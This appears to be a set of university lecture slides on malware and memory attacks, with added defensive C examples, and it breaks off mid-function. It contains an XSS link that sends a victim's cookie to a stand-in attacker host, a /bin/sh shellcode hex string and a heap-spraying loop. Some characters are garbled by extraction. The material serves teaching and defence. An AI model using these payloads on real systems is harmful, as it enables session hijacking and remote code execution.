dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf
Malware
Reading Material
• Ken Thompson and Trojans
  – http://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
• Worm Anatomy and Model
  – http://portal.acm.org/citation.cfm?id=948196
• Smashing the Stack for Fun and Profit
  – http://insecure.org/stf/smashstack.html
Why Do We Care?
• SANS Top 20 Internet Security Vulnerabilities
  – http://www.sans.org/top20/
• Broad issues very similar year in and year out
Zero Day Exploit
• An exploit that has no patch available
• Time between exploit discovery and wide activation shrinking
• Malware developer has trade-off in launch tactics
  – Big splash but faster discovery
  – Reduced attack rate but longer undiscovered
Windows Meta File Exploit
• Exploit flaws in the Windows rendering engine enable remote code execution
  – Memory corruptions
  – Visiting web site with “bad image” causes attack
  – Attack sold for $4,000
  – http://www.eweek.com/article2/0,1895,1918198,00.asp
• Bugtraq post in December 2005
  – Probably lingering earlier
  – 0 day exploit
• Microsoft’s response in early January 2006
  – http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx
Malicious Code
• Set of instructions that cause a site’s security policy to be violated
• Often leveraging an inadvertent flaw (design or implementation)
  – To propagate/install on target
  – To cause harm on target
Malware Summary
Code type      Characteristics
Virus          Attaches itself to program and copies to other programs
Trojan Horse   Contains unexpected, additional functionality
Logic Bomb     Triggers action when condition occurs
Time Bomb      Triggers action when specified time occurs
Trapdoor       Allows unauthorized access to functionality
Worm           Propagates copies of itself through a network
Rabbit         Replicates itself without limit to exhaust resources
Netbot         Trapdoor programs orchestrated through control channel (IRC)
Root Kit       Hooks standard OS calls to hide data
Trojan Horses
• Seemingly useful program that contains code that does harmful things
  – Perform both overt and covert actions
• Frequently embedded in applets or games, email attachments
• Trojan horse logins, spoof authentication or webpage forms
Thompson's Trojan Compiler
• Detect it is compiling “login” program
  – Add “bug” to accept fixed password
• Problem:
  – Easily seen in code review
• Solution:
  – Add second bug activated when compiling compiler itself
  – Then remove bugs from source
Key Loggers and Spyware
• Gather information from computer
  – Send back to the central office
• From key loggers can gather
  – Passwords
  – Confidential communication
  – Keep track of your kids/employees
• From spyware can gather
  – Web browsing habits
  – Gather marketing information
Rootkits
• Insert file filters to cause files or directories to disappear from normal listings
  – Can replace Windows API pointers (user mode)
  – Can also replace syscall table pointers
• Both require privilege, but most Windows installs require privilege anyway
  – The power of extensibility used for the dark side
• Techniques apply equally well to Linux and Mac
Sony Player DRM and Rootkits
• Bad press for Sony 2005
  – Mark Russinovich's original observations
    • http://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments
  – A timeline
    • http://www.boingboing.net/2005/11/14/sony_anticustomer_te.html
• To ensure that copy protection is not evaded install rootkit to hide the protection code
  – Available for other attackers to use
  – Uninstallable
  – Uses CPU and memory
  – Not adequately noted in EULA
Virus Operation
• Virus Phases:
  – Dormant: Waiting on trigger event
  – Propagation: Replicating to programs/disks
  – Triggering: By event to execute payload
  – Execution: Executing payload
• Details usually Machine/OS specific
  – Exploits different features or weaknesses
Virus Pseudocode
• beginvirus:
• If spread-condition then begin
  – For some set of target files do begin
    • If target is not infected then begin
      – Determine where to place virus instructions
      – Copy instructions from beginvirus to endvirus into target
      – Alter target to execute new instructions
• Perform some actions
• Goto beginning of infected program
• endvirus:
Virus Attachment
• A Virus can attach itself to a program or to data by
  – Appending itself to either the beginning or end of either source code or assembly, so it is activated when the program is run
  – Integrate itself into the program, spread out code
  – Integrate into data: executable text macro, scripting
  – Macros and email attachments
• An activated virus may:
  – Cause direct or immediate harm
  – Run as a memory resident program (TSR, daemon, or service)
  – Replace or relocate boot sector programs, start at system start-up
Macro Viruses
• Macro code attached to some data file
  – Interpreted rather than compiled
  – Platform independent
• Interpreted by program using the file
  – E.g., Word/Excel macros
  – Esp. using auto command and command macros
  – Often automatically invoked
• Blurs distinction between data and program files making task of detection much harder
• Classic trade-off: “ease of use” vs “security”
Email Viruses
• Spread using email with attachment containing a macro virus
  – Melissa, LoveBug
• Triggered when user opens or executes attachment
  – Also when mail viewed by using scripting features in mail agent
  – Usually targeted at Microsoft Outlook mail agent and Word/Excel documents, Microsoft IIS
Basic Precautions
• Don’t import untrusted programs
  – Who can you trust?
  – Viruses have been found in commercial shrink-wrap software
  – Standard download sites have been corrupted
    • Check MD5 hashes
• Scan for viruses, install anti-virus software
• Update anti-virus software regularly
Signature Scanning
• Early viruses had characteristic code patterns known as signatures
• Create a database of patterns, search files for patterns (McAfee)
• Use data-mining, learning, feature extraction etc. to look for disguised or obfuscated patterns
• Can only scan for known signatures
Signature Avoiding Viruses
• Polymorphic Virus produces varying but operational copies of itself
  – Use alternative but equivalent instructions
  – Gets around signature scanners. Whale virus, 32 variants
• Stealth Virus actively tries to hide all signs of its presence
  – A virus can intercept calls to read a file and return correct values about file sizes etc.
Another Signature Avoiding Virus
• Encrypted Virus stores bulk of self encrypted
  – Small decrypt routine in clear
  – Key stored in clear
Worms
• Propagate from one computer to another
• Viruses use email/infected media to propagate too, so differentiation is fuzzy
The Morris Worm Incident
• How 99 lines of code brought down the Internet (ARPANET actually) in November 1988.
• Robert Morris Jr. Ph.D student, Cornell, wrote a program that could:
  – Connect to another computer, and find and use one of several vulnerabilities (buffer overflow in fingerd, password cracking etc.) to copy itself to that second computer.
  – Begin to run the copy of itself at the new location.
  – Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET (mistake!)
• Morris was sentenced to three years of probation, 400 hours of community service, and a fine of $10,050. He is now a Professor at MIT.
• Worms have gotten bigger and more aggressive
Worm Phases
• Dormant
• Propagation
  – Search for other systems to infect
  – Establish connection to target remote system
  – Replicate self onto remote system
• Triggering
• Execution
Who to target?
• Scanning
  – Currently generally used
  – Select random addresses
    • Mix of addresses in current network (local computers probably have similar vulnerabilities) and remote networks
  – No longer feasible in IPv6
    • 32 bit vs 128 bit address space
Viruses and Worms in IPv4
• Slammer infected most of the IPv4 Internet in 10 minutes (75,000 hosts infected in one-half hour)
Source: caida.org
Worms in IPv6
• Address space is 2^128 instead of 2^32
  – Random address selection will not work
• Say ¼ of addresses in IPv4 network run Windows
  – 1 in 4 chance of finding a target with each probe
• Spread that among 2^128 addresses
  – 1 in 2^98 chances of finding a viable target
Other Techniques to Find Targets
• Interesting Papers
  – How to 0wn the Internet… http://www.icir.org/vern/papers/cdc-usenix-sec02/
  – Top speed of flash worms http://vividmachines.com/papers/topspeed.pdf
• Hitlist Scanning
  – Stealthy scans (randomized, over months), distributed scanning,
• DNS searches, Spiders (Code red, crawls for high connectivity), listening on P2P networks, public lists
• Permutation scanning (divide up IP address space)
• Warhol worm - Hit list + permutation
Network Propagation
• Send small number of packets to reduce detection
• UDP packets
  – No ACK needed, so can spoof source address
• Connect to vulnerable network services
  – Generally exercise buffer overflow
  – Launch shell
    • Running at high privilege (ideal)
    • Or use as foothold to mount other attacks to gain privilege
    • Or use as attack launch point
Worm Examples
• Morris Worm
• Code Red
  – Exploited bug in MS IIS to penetrate and spread
  – Probes random IPs for systems running IIS
  – Had trigger time for denial-of-service attack
  – 2nd wave infected 360000 servers in 14 hours
• Code Red 2 - trapdoor, for remote control
• Nimda - used multiple infection mechanisms, email, file-sharing, web-client, IIS, Code Red 2 backdoor
Attacks through browsers
HTML is stateless
• Each interaction of a client with server has no memory, at least as far as the protocol is concerned
• Session state is created by server, writing a “cookie” into a document as part of the header, saved by the client’s browser
• May contain anything the server wishes to record, e.g.
  – Password, account number, identity, shopping cart
  – Most typically a session ID
• Cookie is returned by the browser with every access to the server
How cookies work
From the client to the server, something like
With a response (to set a cookie) like
Browser understands to include cookie with every subsequent GET, e.g.
Cookie tells server the second request is related to the first
Other cookie attributes include domain, path, expiration date
Abuse of Cookies
• “Cookie hijacking”
  – Unencrypted cookie value sniffed off network, HTTP session is “hijacked” by outsider who has credentials the cookie represents
• “Cookie Theft”, more subtle, done remotely
  – Track behaviors
  – Reveal identity
  – Steal and abuse identity
• Access to cookies achieved using Javascript
Javascript
• Programming language designed to make web pages “dynamic”, e.g.,
  – Format checking of web form entries
  – Pop open a new window
  – Changing images as cursor passes over specific regions of the page
• Executed within a browser (“client-side”)
  – Can be embedded in page obtained from server
  – Interacts with elements of the page (“Document Object Model”, or DOM)
    • Includes data, javascript can get the value of a cookie
Document Object Model
• A script bound to a page has a “DOM” model of that page
• Can pass information back to the server, or a different web-site altogether
• So we have a powerful programming language in a web page that can get to sensitive information and send it elsewhere
  – Think maybe there’s potential for a problem here?
Protection 101
A browser concurrently manages multiple pages from multiple origins
  – Each has its own document elements, including cookies
The “Same Origin Policy” prevents a document or script from one site of origin from manipulating or communicating with one from a different origin
  – But allows coordination for pages “within” same origin, e.g., scripts can “see” other pages, including their cookies
“Origin” here refers to (domain name, port, protocol) of site, see below
The security assumption
Under the Same Origin Policy, the client browser trusts any script it receives from the server to access any cookie bound to any page in the same domain because it trusts the server
Should it?
Frequently a server will just reflect back input from a client
Example of Reflecting Input
[Figure: Query / Response]
The client might send a script!
A cross site scripting (XSS) vulnerability exists at a server if it reflects back a script that is then executed at the client
But what’s the problem? A client attacks herself?
Watch this….
XSS Attack
• Suppose
  – www.bob.com has an XSS vulnerability
  – Alice visits www.bob.com a lot
    • She logs in, www.bob.com returns a session ID cookie
  – Eve knows about the vulnerability and sends Alice an email with an evil link (containing an attack script)
    • Or embedded in a CSS header with HTML formatted email. Alice only has to OPEN the message!
[Figure: Alice logs in to www.bob.com; www.bob.com returns cookie:session ID]
XSS Attack : Cookie Theft
http://host/a.php?variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?'%20+document.cookie</script>
• Directed at server
• Embedded Script
• Transmission to www.witch.com
• Alice’s cookie
XSS Attack : Cookie Theft
• Click evil URL
  – http://www.bob.com/a.php?variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?'%20+document.cookie</script>
• …<script>… Reflected back
• Script takes permissions of Alice’s page on www.bob.com
• Script executes
[Figure: cookie:session ID passes from Alice’s page on www.bob.com to www.witch.com]
• With Alice’s session ID, Eve can impersonate Alice, obtain sensitive information from her account on www.bob.com
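The server-side fix for the reflection shown above, as an added example that is not part of the original slides: the reflected parameter is HTML-encoded before it reaches the page, and the session cookie is marked HttpOnly so scripts cannot read it. The page template, the cookie name `session` and all function names are assumptions made for this sketch; the sample input is the `variable` value from the slide's link.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sample input: the value of "variable" in the slide's link. */
static const char SAMPLE_INPUT[] =
    "\"><script>document.location='http://www.witch.com/cgi-bin/get.cgi?'"
    "%20+document.cookie</script>";

/* Assumed page template: the parameter is echoed inside an attribute. */
#define PAGE_FMT "<input name=\"variable\" value=\"%s\">"

/* Vulnerable pattern: the parameter is pasted into the page unchanged,
 * so markup inside it becomes part of the page. */
static int reflect_raw(char *out, size_t cap, const char *variable)
{
    int n = snprintf(out, cap, PAGE_FMT, variable);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

/* HTML-encode the five characters that can close an attribute value or
 * open a tag. Returns 0 on success, -1 if out is too small. */
static int html_escape(char *out, size_t cap, const char *in)
{
    size_t used = 0;
    if (cap == 0)
        return -1;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        size_t len = strlen(rep);
        if (used + len + 1 > cap)
            return -1;
        memcpy(out + used, rep, len);
        used += len;
    }
    out[used] = '\0';
    return 0;
}

/* Hardened pattern: encode first, then place the value in the page. */
static int reflect_safe(char *out, size_t cap, const char *variable)
{
    char enc[1024];
    if (html_escape(enc, sizeof enc, variable) != 0)
        return -1;
    int n = snprintf(out, cap, PAGE_FMT, enc);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

/* Session cookie header with HttpOnly (not exposed to document.cookie)
 * and Secure (never sent over plain HTTP). The ID must be alphanumeric
 * so it cannot smuggle extra header lines. */
static int session_cookie_header(char *out, size_t cap, const char *session_id)
{
    if (*session_id == '\0')
        return -1;
    for (const char *p = session_id; *p != '\0'; p++)
        if (!isalnum((unsigned char)*p))
            return -1;
    int n = snprintf(out, cap,
                     "Set-Cookie: session=%s; Path=/; Secure; HttpOnly",
                     session_id);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

int main(void)
{
    char page[2048], hdr[256];
    if (reflect_raw(page, sizeof page, SAMPLE_INPUT) == 0)
        printf("raw:  %s\n", page);
    if (reflect_safe(page, sizeof page, SAMPLE_INPUT) == 0)
        printf("safe: %s\n", page);
    if (session_cookie_header(hdr, sizeof hdr, "abc123") == 0)
        printf("%s\n", hdr);
    return 0;
}
```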
Other XSS attacks
Bulletin Board Postings
  – some permit user inclusion of HTML
Mashups
  – Web sites that integrate interacting components from multiple sources, e.g., hotel listing with maps.google.com at the side or advertisements in Facebook
Mashups work around Same Origin Policy
If a Mashup framework is vulnerable to XSS, then a malicious component can inject code
  – e.g. a paid-for web advertisement
Attacks through memory
Outline
Typical attack through memory is comprised of several parts
  – Find an application with a memory vulnerability
    • Browsers, internet service apps, Adobe Reader…
  – Find a way of a controlled overwrite of a critical piece of memory
    • Usually to get the computer to execute attacker’s code
  – Find a way of getting attacker’s code in memory
  – Trigger vulnerability with carefully crafted attack input
Let’s start at the very beginning
“Von Neumann” computers store programs in memory, along with data
Modern computers use dedicated registers to “point” at key locations
  – Program Counter (PC)
  – Stack Pointer (SP)
An “instruction” is read out from the memory location given by the PC, and interpreted by the control unit
• the PC is increased to point to the next instruction
• the “stack” is dynamically changing scratch space
Memory Organization
Virtual memory --- hardware translation of logical address space to physical : every process “sees” the whole memory for itself
Memory partitioned into different segments with different roles
• Kernel
• Text (instructions)
• Initialized data
• Uninitialized data
• Dynamically allocated
• Stack
• heap
Jumping around
The PC advances linearly, except when it is explicitly loaded
  – To branch on a conditional instruction
  – To “jump” to a subroutine
  – To “return” from a subroutine
  – To handle an exception
  – To select the implementation of a “virtual function”
In all but the first of these cases, the value loaded into the PC is found explicitly in memory.
  – A memory attack consists of changing that value to point to some code the attacker managed to get into the memory
Primer on subroutines
A subroutine is a modular block of code
  – The program “calls” via a special CPU instruction
    • PC is loaded with the subroutine address
  – The subroutine “returns” to the instruction after the calling point, via a special CPU instruction
    • The address loaded into the CPU is on the “stack”
Stack Dynamics
• Each subroutine call pushes a frame onto the stack
  – It is popped on return
  – SP moves with each stack operation
  – Look at position of “Local Variables”
  – Memory writes go from low address to high address
  – Hold that thought….
Buffer Overflow
When a buffer is created in memory, its maximum length is declared
Common operation : copy a string of characters, from one place in memory to another
  – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is reached
[Figure sequence: the string “a b c null” is copied one byte at a time through pointers “from” and “to” into a two-byte empty buffer that sits next to in-use bytes “x y z”. After “a” and “b” fill the buffer, “from” still does not point to null, so “c” is written over the in-use byte “x”.]
Buffer Overflow
• Most common pen-test security vulnerability 2003 (SANS/FBI)
• One of the most serious classes of security threats
  – An attacker can gain partial or complete control of a host
• Buffer (array or string): space in which data can be held
• A buffer’s capacity is finite:
  – char sample[10];
  – sample[10] = 'A';
• Buffer sizes do not have to be predefined. Out-of-bounds error
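The byte-at-a-time copy from the figure next to a bounded replacement, as an added example that is not part of the original slides. The memory layout (a 2-byte buffer followed by in-use bytes "xyz") is constructed to match the figure and lives inside one array so the unchecked loop is safe to run; all names are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed layout modelled on the figure: a 2-byte buffer followed
 * directly by bytes that are "in use". Everything sits in one arena so
 * the unchecked copy stays inside storage this program owns. */
enum { BUF_LEN = 2, IN_USE_LEN = 3, ARENA_LEN = 16 };

struct arena {
    char bytes[ARENA_LEN];   /* [0..1] buffer, [2..4] in use, rest spare */
};

static void arena_init(struct arena *a)
{
    memset(a->bytes, 0, sizeof a->bytes);
    memcpy(a->bytes + BUF_LEN, "xyz", IN_USE_LEN);
}

/* The "sloppy" loop: copy until the source's null byte, never looking
 * at the destination's declared length. Returns bytes written,
 * terminator included. */
static size_t sloppy_copy(char *to, const char *from)
{
    size_t n = 0;
    while ((to[n] = from[n]) != '\0')
        n++;
    return n + 1;
}

/* Bounded copy: writes at most cap bytes, always terminates the result,
 * and returns -1 when the source did not fit so the caller can reject
 * the input instead of silently using a truncated value. */
static int bounded_copy(char *to, size_t cap, const char *from)
{
    size_t i;
    if (cap == 0)
        return -1;
    for (i = 0; i + 1 < cap && from[i] != '\0'; i++)
        to[i] = from[i];
    to[i] = '\0';
    return from[i] == '\0' ? 0 : -1;
}

/* Number of "in use" bytes that no longer hold their original value. */
static int in_use_damaged(const struct arena *a)
{
    int damaged = 0;
    for (int i = 0; i < IN_USE_LEN; i++)
        if (a->bytes[BUF_LEN + i] != "xyz"[i])
            damaged++;
    return damaged;
}

/* Copy "abc" into the 2-byte buffer with either routine and report how
 * many neighbouring bytes were overwritten. */
static int demo(int use_bounded)
{
    struct arena a;
    arena_init(&a);
    if (use_bounded)
        (void)bounded_copy(a.bytes, BUF_LEN, "abc");
    else
        (void)sloppy_copy(a.bytes, "abc");
    return in_use_damaged(&a);
}

int main(void)
{
    printf("sloppy copy damaged %d in-use bytes\n", demo(0));
    printf("bounded copy damaged %d in-use bytes\n", demo(1));
    return 0;
}
```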
Effects of Buffer Overflow
• A program that fails to check a buffer overflow may allow vital code or data to be overwritten
• A buffer may overflow into and change:
  – User’s own data structures
  – User’s program code
  – System data structures
  – System program code
• Most common attack is to subvert the function of a privileged program and take control of the host
Old School : Stack Smashing
• Attacker overflows stack allocated variable to corrupt the return address
• Also called Stack Smashing Attack.
  – Formerly most common buffer-overflow attack, now largely mitigated
• Rewrite return address or frame pointer with attack code, or rewrite pointer to address to “attack” code in user memory
• On return executing code in stack buffer at original program privilege
  – Typically attackers exec a shell
Stack smashing
Sometimes a subroutine will create a buffer in “local variables”, copy a string into it, but not check length
[Figure sequence: attacker data fills the buffer in the local variables and continues past it until the return address holds the address of “shellcode”]
Returning from subroutine call loads PC with address of “shellcode” about which more, anon
Attack code just part of the string being copied
Defense against stack smashing
The attacker needs to know the memory address of his shellcode
  – The attacker’s string gets loaded on to the stack, attacker can use a debugger to figure out addresses
Defenses include
• setting “no execute” protection on stack
• Randomization of memory layout with each program execution
• Static and dynamic buffer bounds checking
The Empire Strikes Back
Attacker attention moved to attacks through memory addresses not on the stack
Stack allocations are temporary, they disappear after a subroutine returns
The “heap” allows a program to dynamically request a block of memory, and have it stay allocated across multiple subroutine calls
The data segments store variables and strings that might also be subverted by an overflow
Example : changing a file name
• Imagine a buffer that resides just below a string that identifies a file
• Further imagine a program that has a buffer overflow vulnerability on “buffer”, opens the named file, and writes user supplied information there
• Attack consists of
  – Overwriting buffer, replacing file name with attacker’s choice, e.g., /etc/.rhosts
  – Choosing string to write into file, e.g., an rhosts file that includes attacker’s machine
• Observe that no subversion of control flow occurs
[Figure: “buffer” sits next to the null-terminated file name string “/tmp/scratch”]
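Attacks through the heap : preliminaries
Remember doubly linked lists
[Figure: three list blocks, each with “next”, “prev” and size fields. Block at 0xbcd3000: next 0xbcd3080, prev null, size 100. Block at 0xbcd3080: next 0xbcd4000, prev 0xbcd3000, size 32. Block at 0xbcd4000: next null, prev 0xbcd3080, size 80.]
Programs dynamically add and delete items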
Attacks through the heap : preliminaries
To remove center block from list, change pointers
[Figure sequence: variable “hdr” holds 0xbcd3000, the address of the first block; the pointers around the center block at 0xbcd3080 are rewritten step by step]
hdr->next->next->prev = hdr->next->prev
OBSERVE : header has target address, AND value to load
hdr->next = hdr->next->next
Attacks through the heap : the real deal
Suppose an attacker can corrupt the middle header
[Figure: the middle header’s pointer fields now hold “Jump adrs” and “Shellcode adrs”; other labels: Function ptr, Sub return, User Data Object]
The unlinking overwrites return adrs
On call to function, control passed to shellcode
How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
  – A pointer to an object that points to the target
  – A pointer to an object immediately “below” the target in memory that can be over-flowed
[Figure sequence: header “hdr” with size 32, “next” and “prev”; the overflow writes “Jump adrs” and “Shellcode adrs” into it]
Heap-based attacks
• Intimate knowledge of how heap is managed required
• Application code with suitable overflow vulnerability required
• Ability to allocate / deallocate heap blocks to position for attack required
• Ability to load shellcode required
• Ability to aim jump at shellcode required
Seems very tricky, but…
Heap-based attacks
• Intimate knowledge of how heap is managed required
  – Attacker can observe using debugger; this information is shared in the cyber underground
• Application code with suitable overflow vulnerability required
  – “Fuzzing” an application with lots of random junk leads to a crash, post-mortem analysis finds where heap pointers corrupted due to overflow… attacker found his toehold
  – Fuzzing with not-so-random junk, e.g. looking for integer/floating point overflows
    • Mismatch between allocated space (too small) and data being loaded there
• Ability to allocate / deallocate heap blocks to position for attack required
  – Web browsers running javascript or flash take scripts offered on webpages and run them.
  – pdf documents carry scripts in their headers, readers run them immediately
• Ability to load shellcode required
  – Shellcode encoded in strings written into dynamically allocated memory
    • May be passed as part of attack input through web connection
    • May be embedded in image, document, or string in attacker’s script
• Ability to aim jump at shellcode required
  – Difficult to get exactly, but there are ways…
State of the art in browser exploitation
Stack overflows : classic, but defenses have been raised
(Structured Exception Handling)
(detect overruns before using jump address)
(attacker has to guess at stack layout)
“Heap Feng Shui in Javascript”, Alexander Sotirov
Heap overflows
We’ve seen proof of concept, in practice it is hard and defenses have been raised
(trick shown earlier….BUSTED)
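Why the unlink trick shown earlier stopped working, as an added example that is not part of the original slides: allocators such as glibc's now verify that both neighbours point back at a block before unlinking it. The struct mirrors the “next”, “prev” and size fields drawn on the slides; the function names and the decoy object that stands in for the overwritten target are assumptions.

```c
#include <stddef.h>
#include <stdio.h>

/* Block header with the three fields drawn on the slides. */
struct block {
    struct block *next;
    struct block *prev;
    size_t size;
};

/* Unlink as on the slides: trusts whatever next/prev contain. If an
 * overflow rewrote them, these stores go where the header says. */
static void unlink_unchecked(struct block *b)
{
    if (b->next) b->next->prev = b->prev;
    if (b->prev) b->prev->next = b->next;
}

/* Unlink with the integrity check: both neighbours must point back at
 * b before any pointer is written. Returns 0 on success, -1 when the
 * header is inconsistent (a real allocator aborts the process here). */
static int unlink_checked(struct block *b)
{
    if (b->next && b->next->prev != b) return -1;
    if (b->prev && b->prev->next != b) return -1;
    unlink_unchecked(b);
    b->next = b->prev = NULL;
    return 0;
}

/* The slide's list: three blocks of size 100, 32 and 80. */
static void build_list(struct block *a, struct block *b, struct block *c)
{
    a->prev = NULL; a->next = b;    a->size = 100;
    b->prev = a;    b->next = c;    b->size = 32;
    c->prev = b;    c->next = NULL; c->size = 80;
}

/* Intact list: the checked unlink removes the center block. Returns 1
 * if the two outer blocks end up linked to each other. */
static int intact_case(void)
{
    struct block a, b, c;
    build_list(&a, &b, &c);
    if (unlink_checked(&b) != 0)
        return 0;
    return a.next == &c && c.prev == &a;
}

/* Corrupted header (constructed): the center block's "next" has been
 * redirected to a decoy object standing in for data outside the list.
 * Returns 1 if the unlink wrote into the decoy, 0 if it was left alone. */
static int decoy_written(int use_checked)
{
    struct block a, b, c, decoy = { NULL, NULL, 0 };
    build_list(&a, &b, &c);
    b.next = &decoy;
    if (use_checked)
        (void)unlink_checked(&b);
    else
        unlink_unchecked(&b);
    return decoy.prev != NULL;
}

int main(void)
{
    printf("intact list unlinked correctly: %d\n", intact_case());
    printf("unchecked unlink wrote to decoy: %d\n", decoy_written(0));
    printf("checked unlink wrote to decoy:   %d\n", decoy_written(1));
    return 0;
}
```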
What’s left to attack?
• Non-array stack overflows
  – Very rare
• Use of uninitialized variables
  – Stack variables
  – Use after “free”
• Application data on the heap
  – Application specific memory headers
  – Function pointers
  – C++ object pointers
Definitive attack “setSlice”
• Uses heap spraying to fill browser heap with shellcode
• Overwrites application object pointer in the previous heap chunk
  – Here an application vulnerability is required
  – Hope that after attack overwrites object pointer, the application actually uses that pointer!
  – May just end up crashing the browser
Heap Spraying
Developed by Blazde and SkyLined, used by most browser exploits since 2004
    var x = new Array();
    // fill 200MB of memory with copies of NOP slide and shellcode
    for (var i = 0; i < 200; i++) {
        x[i] = nop + shellcode;
    }
[Figure: Normal heap layout]
[Figure: After heap spraying]
Function pointer overwrite
1. Spray the heap with 200MB of shellcode (and slide)
2. Overwrite a function pointer with 0x0c0c0c0c (e.g. some pointer to an exception handler in static data)
3. Arrange for the pointer to be called
Object pointer overwrite
• Spray the heap with 200MB of shellcode, using byte 0x0c as a NOP
• Overwrite an object pointer with 0x0c0c0c0c
• Call a virtual function of the object
Pointer to table of virtual function pointers is some offset from base, but is 0x0c0c0c0c
Particular function called determines offset into vtable…but whatever it indexes to, the value there is 0x0c0c0c0c
[Figure: presumed object at 0xc0c0c0c0, presumed vtable at 0xc0c0c0c0, presumed function at 0xc0c0c0c0]
Clever but unreliable
• Heap spraying very effective, but setSlice exploit is not reliable
• Overwriting application data requires a specific layout of heap chunks, not controlled in setSlice
• Need to prepare the heap state prior to the exploit
Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be used to control the layout
• Exploit requires very careful series of heap ops from Javascript….but it works….
You promised us shellcode…
• Small piece of code used as payload in an exploit of a computer vulnerability – Needs to be in binary
• Requires a6enGon to a lot of details • Can’t have null bytes (usually passed as a string, null terminates a string)
– Gives some kind of service to the a6acker • An interacGve command “shell” • TCP/IP connecGon back to a6acker • Downloads and executes malware
– “drive-‐by downloads”
More on Shell Code
• Insert code to spawn a shell
• Phrack article discusses how to do this from first principles
  – Create assembly code to exec /bin/sh
  – Use GDB to get hex of binary code
  – Rework assembly as necessary to avoid internal 0’s
    • Could break attack if strcpy is used by attack target
• Will result in a hex string like:
  – “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”
More on shellcodes
• Local – hacker sitting at the machine, networking not needed
• Remote
  – Connect-back : shellcode able to open TCP/IP connection back to attacker
  – Bindshell : shellcode has to “bind” to a port and “listen” for a connection from the attacker
  – Socket-reuse : shellcode able to use an already opened network connection
    • Hard to exploit, hard to detect
  – Big win if exploited code is “setuid”
    • Means that malware can run with root privileges
Drive-by downloads
• In 2007 Google surveyed billions of sites, subjecting 4.5M to scrutiny
  – 450,000 able to launch drive-by downloads (only through vulnerable browsers)
  – Another 700,000 capable of other compromises
• Many use social engineering, “click here for ….”
• Attack code often hidden in parts of page not controlled by site
  – Banner advertisements, widgets (e.g. traffic counter)… these loaded from 3rd party site
  – Posting / comments in blogs (see cross-site scripting)
Botnets
A compromised host (“zombie”) follows commands obtained from a C&C (command and control) computer
• Zombie will scan environment for resources (what can it be used for?) and report to bot master
• Will often use an IRC channel, IM, or Twitter for communication (to hide)
  – But these become known
  – Reaction has been designs that are more resilient to identification, shutdown, C&C discovery
Botnet economy
• Large botnets have grown (e.g., Conficker)
• Use is sold in an underground economy, e.g., to serve out spam
Conficker
See http://mtc.sri.com/Conficker
Timeline
• Sept 08 : previously unknown vulnerability used in exploits (dubbed MS08-67): malformed Remote Procedure Call requests in Windows cause buffer overflow
  – Affects all modern versions of Windows
• Sept 08 : Chinese hackers sell exploit for $37.80
• Oct 23 08 : Microsoft issues “emergency patch”
• Nov. 22 08: Worm outbreak of Conficker reported in PC World
• Last estimate over 12 million infections
  – Why? Patch ignored. Many bootleg copies of Windows
Conficker : How it works
Exploit:
• Victim : Buffer overflow loads shellcode
  – contacts infector which is running HTTP service, downloads worm
  – Worm is in dynamically linked library (DLL) form, runs as a service via svchost.exe
  – encrypted
  – Brought up with every reboot
• Worm scans (see the CAIDA report)
  – Local network scans (determine broadcast domain from network interface)
  – Nearby other infected hosts: keeps a list of hosts it has infected, and scans the 256 hosts in the same /24 network
  – Random
• Other infection vectors
  – Executes through ADMIN$ share on computers visible to NetBIOS
    • Dictionary attack if password protected
  – Places copies of self on removable drives (e.g. USB drives), loads onto new victim through AUTORUN when inserted
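Seen from the defender's side, the /24 sweep described above shows up as one host reaching almost every address in its own subnet. The following is an added example, not part of the original slides: the struct, function names, the threshold passed by the caller and the sample flow records are all constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>

struct flow { uint32_t src, dst; };  /* IPv4 addresses in host byte order */

#define IP4(a, b, c, d) \
    (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | ((uint32_t)(c) << 8) | (uint32_t)(d))

/* Count the distinct addresses inside host's own /24 that host tried to reach. */
unsigned neighbours_contacted(const struct flow *f, size_t n, uint32_t host) {
    uint8_t seen[32] = {0};          /* one bit per last octet, 256 bits */
    unsigned count = 0;
    for (size_t i = 0; i < n; i++) {
        if (f[i].src != host || f[i].dst == host) continue;
        if ((f[i].dst ^ host) & 0xffffff00u) continue;   /* outside the /24 */
        unsigned last = f[i].dst & 0xffu;
        if (!(seen[last >> 3] & (1u << (last & 7)))) {
            seen[last >> 3] |= (uint8_t)(1u << (last & 7));
            count++;
        }
    }
    return count;
}

/* Flag a host whose fan-out within its /24 reaches the threshold (assumed value). */
int is_subnet_sweep(const struct flow *f, size_t n, uint32_t host, unsigned threshold) {
    return neighbours_contacted(f, n, host) >= threshold;
}

/* Constructed sample: 10.0.5.20 walks its whole /24, 10.0.5.30 talks to 3 peers. */
size_t sample_flows(struct flow *out, size_t cap) {
    size_t n = 0;
    for (unsigned d = 0; d < 256 && n < cap; d++)
        if (d != 20) out[n++] = (struct flow){IP4(10, 0, 5, 20), IP4(10, 0, 5, d)};
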